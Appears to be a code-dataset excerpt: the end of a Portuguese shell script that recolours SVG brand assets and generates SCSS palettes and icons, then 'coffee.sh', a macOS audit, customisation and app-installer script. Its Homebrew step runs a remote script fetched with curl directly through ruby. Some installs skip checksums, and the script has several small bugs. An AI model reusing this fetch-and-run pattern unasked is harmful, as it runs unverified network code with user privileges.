-i1 svg & change brand svg for cesto compras
EO
}
showcolors()
{
# mostra cores actualmente nos svgs
echo
echo "Current colors in $b"
for f in `ls $b`
do ac=`grep -i "$1:#" $b/$f|sed -e "s%.*$1:#\(......\).*%\1%g"|sort -u`
if [ -n "$ac" ];then echo $f $ac;fi
done
echo
echo "Current colors in $c"
for f in `ls $c`
do ac=`grep -i "$1:#" $c/$f|sed -e "s%.*$1:#\(......\).*%\1%g"|sort -u`
if [ -n "$ac" ];then echo $f $ac;fi
done
}
showpalette()
{
valpal
n=1
while [ $n -le $j ]
do a="<h1 style=\"background-color:${vco[$n]};\">"
echo "$a`printf '%03d' $n`-a${aco[$n]}:v${vco[$n]}:${dco[$n]}</h1>"
if [ "${aco[$n]}" != "${vco[$n]}" ]
then getschema "${vco[$n]}" "#`echo ${dco[$n]}|cut -d":" -f1`"
fi
n=`expr $n + 1`
done
}
frontend-variables-skeleton()
{
valpal
# Para calcular rgb decimais
#r5=`echo ${vco[5]}|cut -c2-3|tr '[:lower:]' '[:upper:]'`
#g5=`echo ${vco[5]}|cut -c4-5|tr '[:lower:]' '[:upper:]'`
#b5=`echo ${vco[5]}|cut -c6-7|tr '[:lower:]' '[:upper:]'`
#dr5=`echo "ibase=16; $r5"|bc`
#dg5=`echo "ibase=16; $g5"|bc`
#db5=`echo "ibase=16; $b5"|bc`
cat << EOF
\$c_green: ${vco[5]};
\$c_red: ${vco[12]};
\$layout_background_color: lighten(\$c_green, 80);
\$title_text_color: ${vco[7]};
\$body_text_color: ${vco[1]};
\$link_text_color: \$c_green;
\$product_background_color: ${vco[2]};
\$product_title_text_color: ${vco[6]};
\$product_body_text_color: ${vco[1]};
\$product_link_text_color: \$c_green;
\$border_color: lighten(\$body_text_color, 60);
\$default_border: 1px solid \$border_color;
\$button_border_color: \$link_text_color;
\$table_head_color: lighten(\$body_text_color, 60);
EOF
}
frontend-variables-bootstrap()
{
valpal
cat << EOF
\$brand-primary: ${vco[5]};
\$brand-success: ${vco[5]};
\$brand-info: ${vco[7]};
\$brand-warning: ${vco[10]};
\$brand-danger: ${vco[12]};
\$brand-red3: ${vco[3]};
\$btn-default-bg: ${vco[5]};
\$btn-default-color: ${vco[1]};
\$btn-default-border: \$btn-default-bg;
\$btn-primary-border: \$brand-primary;
\$btn-success-border: \$brand-success;
\$btn-info-border: \$brand-info;
\$btn-warning-border: \$brand-warning;
\$btn-danger-border: \$brand-danger;
\$border-radius-base: 2px;
\$border-radius-large: 4px;
\$border-radius-small: 1px;
\$font-family-sans-serif: "Ubuntu", sans-serif;
\$font-family-serif: "Ubuntu", serif;
\$font-family-monospace: "Ubuntu Mono", monospace;
@import "bootstrap-sprockets";
@import "bootstrap";
@mixin fenix-button-variant(\$cor) {
&:hover,
&:focus,
&:active,
&.active,
.open > &.dropdown-toggle {
background-color: \$cor;
border-color: \$cor;
}
.badge {
background-color: \$cor;
}
}
.btn-default {
@include fenix-button-variant(\$brand-red3);
}
.btn-primary {
@include fenix-button-variant(\$brand-red3);
}
.btn-success {
@include fenix-button-variant(\$brand-red3);
}
EOF
}
frontend-fenix-skeleton()
{
valpal
cat << EOF
input[type="submit"], input[type="button"],
input[type= "reset"], button, a.button {
border: none;
padding: 6px 10px 6px;
vertical-align: center;
-webkit-border-radius: 2px;
-khtml-border-radius: 2px;
-moz-border-radius: 2px;
-ms-border-radius: 2px;
-o-border-radius: 2px;
border-radius: 2px;
&:hover {
background-color: ${vco[3]};
}
}
a {
&:hover {
color: ${vco[3]};
}
}
nav #main-nav-bar {
li {
&#link-to-cart {
a {
&:hover {
color: ${vco[3]};
}
}
}
}
}
EOF
}
backend-variables()
{
valpal
cat << EOF
\$color-1: ${vco[2]}; // c2-white
\$color-2: ${vco[6]}; // c6
\$color-3: ${vco[3]}; // c3-red3
\$color-4: ${vco[5]}; // c5-base
\$color-5: ${vco[4]}; // c4-red4
\$color-6: ${vco[7]}; // c7-info
// Body base colors
\$color-body-bg: \$color-1;
\$color-body-text: ${vco[1]}; // c1-cinza
\$color-headers: \$color-6;
\$color-link: \$color-4;
\$color-link-hover: \$color-3;
\$color-link-active: \$color-4;
\$color-link-focus: \$color-4;
\$color-link-visited: \$color-3;
\$color-border: very-light(\$color-4, 12);
// Basic flash colors
\$color-success: ${vco[11]};
\$color-notice: ${vco[10]};
\$color-error: ${vco[12]};
// Table colors
\$color-tbl-odd: \$color-1;
\$color-tbl-even: very-light(\$color-4, 4);
\$color-tbl-thead: very-light(\$color-4, 4);
// Button colors
\$color-btn-bg: \$color-4;
\$color-btn-text: \$color-1;
\$color-btn-hover-bg: \$color-3;
\$color-btn-hover-text: \$color-1;
// Select2 select field colors
\$color-sel-bg: \$color-4;
\$color-sel-text: \$color-body-text;
\$color-sel-hover-bg: \$color-3;
\$color-sel-hover-text: \$color-body-text;
// Text inputs colors
\$color-txt-brd: lighten(\$color-body-text, 60);
\$color-txt-text: \$color-body-text;
\$color-txt-hover-brd: \$color-4;
EOF
}
backend-fenix()
{
valpal
cat << EOF
// Fenix some color changes
#admin-menu {
background-color: \$color-4;
li {
a {
color: \$color-1 !important;
&:hover {
background-color: \$color-3;
&:after {
border-top: 5px solid \$color-3;
}
}
}
.dropdown {
background-color: \$color-3;
}
&.selected a {
@extend a:hover;
}
}
}
#sub-menu {
background-color: lighten(\$color-4, 10);
li {
a {
color: \$color-1 !important;
}
&.selected a, a:hover {
background-color: \$color-3;
&:after {
border-top: 5px solid \$color-3;
}
}
}
}
EOF
}
proccolors()
{
# troca de cores nos svgs: proccolors ${aco[$n]} ${vco[$n]} ${dco[$n]}
if [ $1 != $2 -a -n "`echo $lb $lc|grep -i $2`" ];then
if [ -n "`echo $lb|grep -i $2`" -a -z "`echo $lb|grep -i $1`" ];then
echo "processar $b/*.svg for $3=$2 CHANGED to $1"
for f in `ls $b`
do lf=`grep -i fill:# $b/$f|sed -e 's%.*fill:\(#......\).*%\1%g'|sort -u`
if [ -n "`echo $lf|grep -i $2`" -a -z "`echo $lf|grep -i $1`" ];then
echo "$b/$f ALTERADO";fc=`expr $fc + 1`
sed -e "s%fill:$2%fill:$1%g" $b/$f >$b/z$f;mv $b/$f $i;mv $b/z$f $b/$f
else if [ -n "`echo $lf|grep -i $1`" ];then
echo "$b/$f NAOALTERADO alredy has $1"
fi
fi
done
else if [ -n "`echo $lb|grep -i $1`" ];then
echo "$b/*.svg nao processados for $3 alredy have $1"
fi
fi
if [ -n "`echo $lc|grep -i $2`" -a -z "`echo $lc|grep -i $1`" ];then
echo "processar $c/*.svg for $3=$2 CHANGED to $1"
for f in `ls $c`
do lf=`grep -i fill:# $c/$f|sed -e 's%.*fill:\(#......\).*%\1%g'|sort -u`
if [ -n "`echo $lf|grep -i $2`" -a -z "`echo $lf|grep -i $1`" ];then
echo "$c/$f ALTERADO";fc=`expr $fc + 1`
sed -e "s%fill:$2%fill:$1%g" $c/$f >$c/z$f;mv $c/$f $i;mv $c/z$f $c/$f
else if [ -n "`echo $lf|grep -i $1`" ];then
echo "$c/$f NAOALTERADO alredy has $1"
fi
fi
done
else if [ -n "`echo $lc|grep -i $1`" ];then
echo "$c/*.svg nao processados for $3 alredy have $1"
fi
fi
fi
}
# default logos & compositions
f1=qa # fenix.3red
f2=qd # logo-dark.2reds
f3=qc # fenix.5cor
f4=qe # fat-logo-dark.2reds
l1=ca # logo-light-red-byfenixdecorare
l2=cb # logo-light-bw-byfenixdecorare
l3=cc # logo-dark-black-tagline
i1=ea # cesto-compras
# operation dirs
b=base
i=svg
o=png
c=comp
t=tmp
v=jpg
# obter cores actuais nos svgs para processar alteracao
# aco[03-09] calculadas a partir de c_fenix
# aco[13] calculadas a partir de vco[1] sinza
currentsvgcolors
c_fenix=${vco[5]}
aco[1]=${vco[1]}
aco[2]=${vco[2]}
aco[10]=${vco[10]}
aco[11]=${vco[11]}
aco[12]=${vco[12]}
# teste pedidos alteracao de cor
ta=0
as=adjust_saturation
ab=adjust_brightness
# valor max em que uma cor e considereda similar
m="0.1"
SOPTS="hfsprqednao:l:c:m:t:u:b:"
LOPT1="f1:,f2:,f3:"
LOPT2="l1:,l2:"
LOPT3="i1:"
LOPTS="opt,$LOPT1,$LOPT2,$LOPT3"
ARGS=$(getopt -a -o $SOPTS -l $LOPTS --name $PROGNAME -- "$@")
eval set -- "$ARGS"
while true; do
case $1 in
-h) usage ; exit 0;;
-f) showcolors fill ; exit 0;;
-s) showcolors stroke ; exit 0;;
-p) showpalette ; exit 0;;
-r) simreport ; exit 0;;
-q) frontend-variables-skeleton ; exit 0;;
-e) frontend-variables-bootstrap; exit 0;;
-d) frontend-fenix-skeleton ; exit 0;;
-n) backend-variables ; exit 0;;
-a) backend-fenix ; exit 0;;
-o) showcoldest $2 ; exit 0;;
-l) m=$2 ; shift;;
-c) simchange $2 ; exit 0;;
-m) matchedlist $2 ; exit 0;;
-t) matchscript $2 ; exit 0;;
-u) unmatchedlist $2 ; exit 0;;
-b) simback $2 ; exit 0;;
--opt) optsvgs ; exit 0;;
--f1) f1=$2; shift;;
--f2) f2=$2; shift;;
--f3) f3=$2; shift;;
--l1) l1=$2; shift;;
--l2) l2=$2; shift;;
--i1) i1=$2; shift;;
--) shift; break;;
*) shift; break;;
esac
shift
done
# validar pelette cores
valpal
# valcor verificou validade e pedidos de alteracao de cores
# se houve pedido de alteraco de cores os svg sao processados
if [ $ta -eq 1 ]
then
# listas globais nos svg base, comp
lb=`grep -i fill:# $b/*.svg|sed -e 's%.*fill:\(#......\).*%\1%g'|sort -u`
lc=`grep -i fill:# $c/*.svg|sed -e 's%.*fill:\(#......\).*%\1%g'|sort -u`
# processamento de cores novas nos svgs
fc=0
n=1
while [ $n -le $j ]
do proccolors ${aco[$n]} ${vco[$n]} ${dco[$n]};n=`expr $n + 1`
done
if [ $fc -gt 0 ]
then echo "[IMPORTANTE] Altere variaveis em currentsvgcolors com cores alteradas"
else echo "Foi pedida uma alteracao de schema de cores mas nenhuma alteracao foi necessaria"
fi
fi
#Usada para conversao -> png & jpg optimizadas
cpng="-strip -quality 75% -sampling-factor 4:2:0"
cjpg="-background white -flatten -interlace Line $cpng"
echo "Basic color palette for fenix"
r1="puts Color::RGB.from_html('$c_fenix')"
echo "`ruby -r color -e \"$r1.css_hsl\"`;`ruby -r color -e \"$r1.css_rgb\"`"
# para apple devices apple-touch-icon.png,icon_128.gif,favicon.ico
rsvg-convert -h 16 -a -f png $b/$f4.svg -o $t/$f4-0016.png
rsvg-convert -h 32 -a -f png $b/$f4.svg -o $t/$f4-0032.png
rsvg-convert -h 48 -a -f png $b/$f2.svg -o $t/$f2-0048.png
rsvg-convert -h 64 -a -f png $b/$f2.svg -o $t/$f2-0064.png
rsvg-convert -h 75 -a -f png $b/$f2.svg -o $t/$f2-0075.png # facebook app
rsvg-convert -h 120 -a -f png $b/$f2.svg -o $t/$f2-0120.png # google OAuth
rsvg-convert -h 128 -a -f png $b/$f2.svg -o $t/$f2-0128.png
rsvg-convert -h 180 -a -f png $b/$f2.svg -o $t/$f2-0180.png # facebook profile needs this
rsvg-convert -h 256 -a -f png $b/$f2.svg -o $t/$f2-0256.png
rsvg-convert -h 600 -a -f png $b/$f1.svg -o $t/$f1-0600.png # foto id da fenix decorare
rsvg-convert -h 1024 -a -f png $b/$f2.svg -o $t/$f2-1024.png
#Usada para conversao -> png optimizadas
convert $cpng $t/$f4-0016.png $o/$f4-0016.png
convert $cpng $t/$f4-0032.png $o/$f4-0032.png
convert $cpng $t/$f2-0048.png $o/$f2-0048.png
convert $cpng $t/$f2-0064.png $o/$f2-0064.png
convert $cpng $t/$f2-0075.png $o/$f2-0075.png
convert $cpng $t/$f2-0120.png $o/$f2-0120.png
convert $cpng $t/$f2-0128.png $o/$f2-0128.png
convert $cpng $t/$f2-0180.png $o/$f2-0180.png
convert $cpng $t/$f2-0256.png $o/$f2-0256.png
convert $cpng $t/$f1-0600.png $o/$f1-0600.png
convert $cpng $t/$f2-1024.png $o/$f2-1024.png
convert -background ${aco[5]} $b/qb.svg $cpng -thumbnail 152x152 $o/apple-touch-icon.png
convert -background none -bordercolor none $b/$f2.svg $cpng -thumbnail 200x200 -border 50x50 $o/$f2-gpp.png
convert -background none -bordercolor none $b/$f1.svg $cpng -thumbnail 500x500 -border 50x50 $o/$f1-fid.png
convert -background none $b/$f2.svg -thumbnail 128x128 $o/icon_128.gif
convert $o/$f4-0016.png $o/$f4-0032.png \
$o/favicon.ico
# Logos redes sociais x32
rsvg-convert -h 24 -a -f svg $c/sf.svg|svgo -i - -o $i/sf.svg
rsvg-convert -h 24 -a -f svg $c/sg.svg|svgo -i - -o $i/sg.svg
rsvg-convert -h 24 -a -f svg $c/sl.svg|svgo -i - -o $i/sl.svg
rsvg-convert -h 24 -a -f svg $c/st.svg|svgo -i - -o $i/st.svg
rsvg-convert -h 24 -a -f svg $c/sy.svg|svgo -i - -o $i/sy.svg
gzip -cfq9 $i/sf.svg > $i/sf.svgz
gzip -cfq9 $i/sg.svg > $i/sg.svgz
gzip -cfq9 $i/sl.svg > $i/sl.svgz
gzip -cfq9 $i/st.svg > $i/st.svgz
gzip -cfq9 $i/sy.svg > $i/sy.svgz
# Composicoes loja used by spree 176x82
rsvg-convert -h 82 -a -f png $c/$l3.svg -o $o/logo-loja-casadosquadros.png
rsvg-convert -h 40 -a -f png $c/$l3.svg -o $o/logo-loja-casadosquadros-admin.png
convert $cjpg $o/logo-loja-casadosquadros.png $v/logo-loja-casadosquadros.jpg
convert $cjpg $o/logo-loja-casadosquadros-admin.png $v/logo-loja-casadosquadros-admin.jpg
# Criar versao svg optimizada para frontend
# svgz precisa content-encoding http header set gzip in aws
rsvg-convert -h 82 -a -f svg $c/$l3.svg|svgo -i - -o $i/logo-loja-casadosquadros.svg
gzip -cfq9 $i/logo-loja-casadosquadros.svg > $i/logo-loja-casadosquadros.svgz
# Composicao google-api-logo max120x60
#rsvg-convert -w 119 -a -f png $c/$l3.svg -o $o/$l3-ga.png
# Composicoes loja used by spree noimage
clet=${aco[5]}
rsvg-convert -a -h 240 -f png $b/$f2.svg -o $t/$f1-pr.png
./preplet.sh imagem la t240 h120 $clet
./preplet.sh "não existe" la t240 h120 $clet
convert $o/panão_existe.png $o/paimagem.png \
-gravity center -append $t/pr.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/product.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/large.png
convert $cjpg $o/product.png $v/product.jpg
convert $cjpg $o/large.png $v/large.jpg
rsvg-convert -a -h 100 -f png $b/$f2.svg -o $t/$f1-pr.png
./preplet.sh imagem la t100 h50 $clet
./preplet.sh "não existe" la t100 h50 $clet
convert $o/panão_existe.png $o/paimagem.png \
-gravity center -append $t/pr.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/small.png
convert $cjpg $o/small.png $v/small.jpg
rsvg-convert -a -h 48 -f png $b/$f2.svg -o $t/$f1-pr.png
./preplet.sh imagem la t48 h24 $clet
./preplet.sh "não existe" la t48 h24 $clet
convert $o/panão_existe.png $o/paimagem.png \
-gravity center -append $t/pr.png
composite $cpng -dissolve 25% -gravity center \
$t/$f1-pr.png $t/pr.png $o/mini.png
convert $cjpg $o/mini.png $v/mini.jpg
rm $o/paimagem.png $o/panão_existe.png
# Composição access report x400
rsvg-convert -h 400 -a -f png $c/$l2.svg -o $o/$l2-go.png
convert $o/$l2-go.png -background white -flatten $v/$l2-go.jpg
rm $o/$l2-go.png
exit
# Composição google+,paginas, min(480x270)
rsvg-convert -w 480 -h 270 -f png $c/$l1.svg -o $o/$l1-gpp.png
# Composição google Enterprise 143x59
rsvg-convert -f png $c/$l1.svg -o $o/$l1-ge.png
# Composicoes facebook
# capa-min720x
# banners f1=155x100 f2=800x150 opcionais f2=180x115 f4=394x150
rsvg-convert -w 722 -a -f png $c/$l1.svg -o $o/$l1-fb.png
# Composicao twitter capa-1252x626 fundo-1000
rsvg-convert -w 1252 -h 626 -f png $c/$l1.svg -o $o/$l1-tw.png
rsvg-convert -w 1000 -a -f png $b/$t1.svg -o $o/$t1-tw.png
# Composicao flickr-api-logo 300x90 max600x300
convert -background none $c/$l2.svg -thumbnail 396x90 $o/$l2-fl.gif
# Composicao youtube channel
#tv 2120x1192
#desktop 2120x350
#tablet 1536x350
#mobile 1280x350
rsvg-convert -f png $c/$l3.svg -o $t/$l3-yt.png
convert $t/$l3-yt.png -background white -flatten $v/$l3-yt.jpg
# Composicao logo comunidade navbar tem x50
# com estes -h da x46 em ambos png,svg
rsvg-convert -a -h 46 -f png $c/$l1.svg -o $o/cfpt-logo.png
rsvg-convert -a -h 37 -f svg $c/$l1.svg -o $t/cfpt-logo.svg
./css.rb $t/cfpt-logo.svg > $i/cfpt-logo.svg
# Composicao blog x200
#rsvg-convert -h 200 -a -f png $c/$l2.svg -o $t/$l2-bl.png
#convert $t/$l2-bl.png -background white -flatten $v/bg1.jpg
# Composicao botoes doar fenix 80x64, paypal 73x26
rsvg-convert -f png $c/$l4.svg -o $o/$l4-doar.png
rsvg-convert -f png $c/$l5.svg -o $o/$l5-doar.png
| true |
64ea4f3600ee92619a61f059b7647826b875c211 | Shell | ergo-dubito/dotfiles-6 | /coffee.sh | UTF-8 | 15,682 | 3.765625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
#coffee.sh
#THINGS TO ADD:
# - install applications function instead of repeated code in each function
# - potentially add .files to be installed
# - add function to verify signature of applications before install
# - checksum function for applications that have checksums online, again
# instead of being repeated in functions
#Inspired from 0xmachos bittersweet.sh
#Tested on macOS 10.13, 10.14 beta w/ MacBook Pro 2016
set -euo pipefail
# -e if any command returns a non-zero status code, exit
# -u don't use undefined vars
# -o pipefall pipelines fails on the first non-zero status code
#Set colours for easy spotting of errors
FAIL=$(echo -en '\033[0;31m')
PASS=$(echo -en '\033[0;32m')
NC=$(echo -en '\033[0m')
WARN=$(echo -en '\033[0;33m')
INFO=$(echo -en '\033[0;35m')
function usage {
cat << EOF
Usage:
audit - Audit macOS security ⛑
customise - Customise the default options of macOS 😍
bailiff - Install Bailiff ☁️
gpgtools - Install GPG Tools ⚙️
sublime - Install Sublime Text 👨💻
tower - Install Tower 💂♂️
xcode - Install Xcode
brew - Install Homebrew 🍺
dotfiles - Install dotfiles 🔑
all - Install the items listed above ❤️
EOF
exit 0
}
function cleanup {
#Unmounting and deleting any installers that were mounted or downloaded
echo "${INFO}|||${NC} Starting Cleanup"
local download_dmg
local installer
download_dmg=${1:?download_dmg not passed to cleanup}
installer=${2:?installer not passed to cleanup}
echo "${INFO}|||${NC} Deleting ${download_dmg}"
rm -r "${download_dmg}"
if [ -f "${installer}" ] ; then
if echo "${installer}" | grep ".zip" ; then
echo "${INFO}|||${NC} Deleting ${installer}"
rm -rf "${installer}"
else
echo "${INFO}|||${NC} Unmounting from ${installer}"
hdiutil detach -quiet "${installer}"
fi
fi
}
function check_sudo_permission {
if [ "$EUID" -ne 0 ]; then
# NOT SUDO
return 0
else
return 1
fi
}
function check_firewall {
firewall="$(defaults read /Library/Preferences/com.apple.alf globalstate)"
if [[ "${firewall}" -ge 1 ]] ; then
return 0
else
return 1
fi
}
function check_stealth_firewall {
stealth="$(defaults read /Library/Preferences/com.apple.alf stealthenabled)"
if [[ "${stealth}" -eq 1 ]] ; then
return 0
else
return 1
fi
}
function check_filevault {
if fdesetup status | grep "On" > /dev/null ; then
return 0
else
return 1
fi
}
function check_efi {
#https://eclecticlight.co/2018/06/02/how-high-sierra-checks-your-efi-firmware/
if /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check > /dev/null ; then
return 0
else
return 1
fi
}
function check_firmware_pwd {
if sudo firmwarepasswd -check | grep -q 'Yes' ; then
return 0
else
return 1
fi
}
function check_sip {
if csrutil status | grep -q 'enabled' ; then
return 0
else
return 1
fi
}
function audit_macOS {
#TODO: Check GateKeeper enabled
echo "${INFO}|||${NC} Auditing macOS..."
if check_sudo_permission ; then
echo "${WARN}|||${NC} Password may be required..."
fi
local AUDIT_PASS
local AUDIT_FAIL
audit_functions=( check_filevault check_efi check_firmware_pwd check_sip check_firewall check_stealth_firewall)
for f in "${audit_functions[@]}" ; do
if "${f}" ; then
AUDIT_PASS+=("${f}")
else
AUDIT_FAIL+=("${f}")
fi
done
echo "${PASS}|||${NC} Functions that passed audit: "
for f in "${AUDIT_PASS[@]}" ; do
echo " ${f}"
done
if [[ "${#AUDIT_PASS[@]}" == "${#audit_functions[@]}" ]] ; then
echo "${PASS}|||${NC} Hooray! Everything passed 🎉"
exit 0
else
echo "${FAIL}|||${NC} Functions that failed audit: "
for g in "${AUDIT_FAIL[@]}" ; do
echo "${g}"
done
fi
exit 0
}
function customise_defaults {
echo "${INFO}|||${NC} Customising the defaults..."
#Disable Guest User
#default: sudo defaults write /Library/Preferences/com.apple.AppleFileServer guestAccess -bool true
sudo defaults write /Library/Preferences/com.apple.AppleFileServer guestAccess -bool false
#Enable Firewall
#default: sudo defaults write /Library/Preferences/com.apple.alf globalstate -bool false
sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 1
#NOTE: Can set -int 2 for stricter firewall that will only allow essential services such as DHCP
#TODO: Enable account name in tool bar
#Enable Secure Keyboard Entry
#default: defaults write com.apple.Terminal SecureKeyboardEntry -bool false
defaults write com.apple.Terminal SecureKeyboardEntry -bool true
#TODO: Enable unlock with Apple Watch (maybe)
#Show battery percentage
#default: defaults write com.apple.menubar.battery ShowPercent NO
defaults write com.apple.menuextra.battery ShowPercent -string "YES"
#TODO: Set Flip Clock screensaver
#Enable Plain Text Mode in TextEdit by Default
#default: defaults write com.apple.TextEdit RichText -int 1
defaults write com.apple.TextEdit RichText -int 0
#Save panel Expanded View by default
#default: defaults write -g NSNavPanelExpandedStateForSaveMode -bool false
# defaults write -g NSNavPanelExpandedStateForSaveMode -bool false
defaults write -g NSNavPanelExpandedStateForSaveMode -bool true
defaults write -g NSNavPanelExpandedStateForSaveMode2 -bool true
#Print panel Expanded View by default
#default: defaults write -g PMPrintingExpandedStateForPrint -bool false
# defaults write -g PMPrintingExpandedStateForPrint2 -bool false
defaults write -g PMPrintingExpandedStateForPrint -bool true
defaults write -g PMPrintingExpandedStateForPrint2 -bool true
#WORK IN PROGRESS --------------
#'set dark mode to false' to set to light mode
osascript << EOF
tell application "System Events"
tell appearance preferences
set dark mode to true
end tell
end tell
EOF
#Show all hidden files in Finder
#default: defautls write com.apple.Finder AppleShowAllFiles -bool false
defautls write com.apple.Finder AppleShowAllFiles -bool true
#Save Screenshots in PNG
#default: defaults write com.apple.screencapture -string "???"
defaults write com.apple.screencapture -string "png"
#Require password immediately after sleep or screen saver starting
defaults write com.apple.screensaver askForPassword -int 1
defaults write com.apple.screensaver askForPasswordDelay -int 0
#Show icons for removable media on Desktop
#default: defaults write com.apple.finder ShowMountedServersOnDesktop -bool false \
# defaults write com.apple.finder ShowRemovableMediaOnDesktop -bool false
defaults write com.apple.finder ShowMountedServersOnDesktop -bool true
defaults write com.apple.finder ShowRemovableMediaOnDesktop -bool true
#Windows-style sorting: keep folder on top
#default: defaults write com.apple.finder _FXSortFoldersFirst -bool false
defaults write com.apple.finder _FXSortFoldersFirst -bool true
#Finder: Search current folder first by default
#default: defaults write com.apple.finder FXDefaultSearchScope -string "????"
defaults write com.apple.finder FXDefaultSearchScope -string "SCcf"
#Hot Corners 🤙
#Bottom-left - Mission Control
defaults write com.apple.dock wvous-bl-corner -int 2
defaults write com.apple.dock wvous-bl-modifier -int 0
#Bottom-right - Show Desktop
defaults write com.apple.dock wvous-br-corner -int 4
defaults write com.apple.dock wvous-br-modifier -int 0
#App Store: Check for updates daily
#default: defaults write com.apple.SoftwareUpdate ScheduleFrequency -int 7
defaults write com.apple.SoftwareUpdate ScheduleFrequency -int 1
#NOTE: REMOVE "Show all hidden files/folder" and change it to
# Show Desktop, .ssh, Documents in Users folder instead ❤️
exit 0
}
function install_bailiff {
echo "${INFO}|||${NC} Installing Bailiff..."
exit 0
}
function install_gpg {
local download
local download_dmg
local hash
local installer_path
echo "${INFO}|||${NC} Installing GPG Tools..."
#Get latest version of GPGTools from the GPGTools home page (work something more reliable out for this)
download="$(curl -s "https://gpgtools.org" | grep "version" | awk -F "/" '{ print $4 }')"
download_dmg="GPG_Suite-${download}.dmg"
if [ -f "${download_dmg}" ] ; then
echo "${PASS}|||${NC} ALREADY DOWNLOADED"
#Not needed as hash is calculated in if statement later
#local download_hash="$(shasum -a 256 "${download_dmg}")"
elif curl -o "${download_dmg}" "https://releases.gpgtools.org/${download_dmg}"; then
echo "${PASS}|||${NC} DOWNLOADED"
fi
#Retrieve hash from gpgtools.org
hash="$(curl -s "https://gpgtools.org/gpgsuite.html" | grep "SHA256" | awk -F ">" ' $5>0 { print substr($5,1,64) } ')"
#Compare hashes of download to hash online
if [[ "$(shasum -a 256 "$download_dmg")" = "$hash"* ]]; then
echo "${PASS}|||${NC} Hash verified"
installer_path="/Volumes/GPG Suite"
if hdiutil attach -quiet "$download_dmg" ; then
echo "${PASS}|||${NC} Mounted installer"
#Find a way to check if script running as sudo instead of just printing this...
if check_sudo_permission ; then
echo "${WARN}|||${NC} Password may be required..."
fi
if sudo installer -pkg "${installer_path}/Install.pkg" -target "/" >/dev/null; then
echo "${PASS}|||${NC} Installed GPG Tools"
else
echo "${FAIL}|||${NC} Failed to Install"
exit 1
fi
else
echo "${FAIL}|||${NC} Failed to mount .dmg"
exit 1
fi
echo "${PASS}|||${NC} Completed Installation"
else
echo "${FAIL}|||${NC} Failed to verify hash"
exit 1
fi
cleanup "$download_dmg" "$installer_path"
exit 0
}
function install_sublime {
echo "${INFO}|||${NC} Installing Sublime Text..."
local download_url
local download_dmg
if ! [ -d "/Applications/Sublime Text.app" ] ; then
download_url="$(curl -s "https://www.sublimetext.com" | grep ".dmg" | awk -F '"' '{ print $4 }')"
echo "$download_url"
download_dmg="$(echo "$download_url" | awk -F "/" '{ print $4 }')"
echo "$download_dmg"
if ! [ -f "${download_dmg}" ] ; then
#No need for shasum as there is none available on the website
if curl -o "${download_dmg}" "${download_url}" ; then
echo "${PASS}|||${NC} Downloaded ${download_dmg}"
else
echo "${FAIL}|||${NC} Download failed."
exit 1
fi
else
echo "${PASS}|||${NC} Already downloaded ${download_dmg}"
fi
if [ -f "${download_dmg}" ] ; then
installer_path="/Volumes/Sublime Text"
if hdiutil attach -quiet "$download_dmg" ; then
echo "${PASS}|||${NC} Mounted installer"
#Find a way to check if script running as sudo instead of just printing this...
if check_sudo_permission ; then
echo "${WARN}|||${NC} Password required to run as sudo"
fi
if sudo cp -r "${installer_path}/Sublime Text.app" "/Applications" ; then
echo "${PASS}|||${NC} Installed Sublime Text"
else
echo "${FAIL}|||${NC} Failed to installed Sublime Text"
exit 1
fi
else
echo "${FAIL}|||${NC} Failed to mount .dmg"
exit 1
fi
echo "${PASS}|||${NC} Completed Installation"
else
echo "${FAIL}|||${NC} Something went wrong. Installer is missing."
exit 1
fi
if "ln -s "/Applications/Sublime Text.app/Contents/SharedSupport/bin/subl" /usr/local/bin/sublime" ; then
echo "${PASS}|||${NC} Symlinked Sublime to open from terminal!"
else
echo "${FAIL}|||${NC} Failed to symlink Sublime, so it won't open from terminal..."
fi
cleanup "$download_dmg" "$installer_path"
else
echo "${PASS}|||${NC} Sublime Text already installed"
fi
exit 0
}
function install_tower {
if ! [ -f "/Applications/Tower.app" ] ; then
download_url="$(curl -s "https://www.git-tower.com/release-notes/mac" | grep ".zip" | awk -F ".zip" ' { print $1 }' | awk -F '"' ' { print $NF } ')"
download_url+=".zip"
download_zip="$(echo $download_url | awk -F "/" ' { print $NF } ')"
if curl -o "$download_zip" "$download_url" ; then
echo "DOWNLOADED"
else
echo "FAILED"
exit 1
fi
if unzip -q "$download_zip" -d "." ; then
echo "Unzipped $download_zip"
if check_sudo_permission ; then
echo "${WARN}|||${NC} Password required to run as sudo"
fi
if sudo cp -r "Tower.app" "/Applications" ; then
echo "Installed Tower in Applications!"
else
echo "Failed to copy to /Applications. Running as sudo?!"
exit 1
fi
else
echo "Failed to unzip."
exit 1
fi
else
echo "Tower is already installed!"
exit 0
fi
cleanup "Tower.app" "$download_zip"
exit 0
}
function install_xcode {
echo "${INFO}|||${NC} Installing Xcode..."
exit 0
}
function install_brew {
echo "${INFO}|||${NC} Installing Homebrew..."
if ! [[ "$(command -v brew)" > /dev/null ]] ; then
# shellcheck disable=SC2057
if /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" ; then
echo "Homebrew installed!"
else
echo "Failed to installe Homebrew..."
exit 1
fi
else
echo "Homebrew already installed!"
brew update
brew upgrade
fi
if ! [[ "$(command -v brew-file)" > /dev/null ]] ; then
echo "Installing brew-file"
if brew install rcmdnk/file/brew-file ; then
echo "brew-file installed"
else
echo "Failed to install brew-file"
exit 1
fi
else
echo "brew-file already installed"
fi
#At a later date, this will be changed to either be assigned from the command line or by default this repo path
local brewFile="./Brewfile"
if check_sudo_permission ; then
echo "${WARN}|||${NC} Password required to run as sudo"
fi
if brew file install -f "${brewFile}" ; then
echo "${PASS}|||${NC} Packages from Brewfile installed!"
else
echo "${FAIL}|||${NC} Packages failed to install"
exit 1
fi
if check_sudo_permission ; then
echo "${WARN}|||${NC} Password required to run as sudo"
fi
# Update Bash after install through homebrew
#https://johndjameson.com/blog/updating-your-shell-with-homebrew/
# Run following as Sudo user
# https://unix.stackexchange.com/a/269080
if sudo bash -c "echo /usr/local/bin/bash >> /etc/shells" ; then
#Change shell to new bash
if chsh -s /usr/local/bin/bash ; then
echo "${PASS}|||${NC} Shell changed to Bash from homebrew"
else
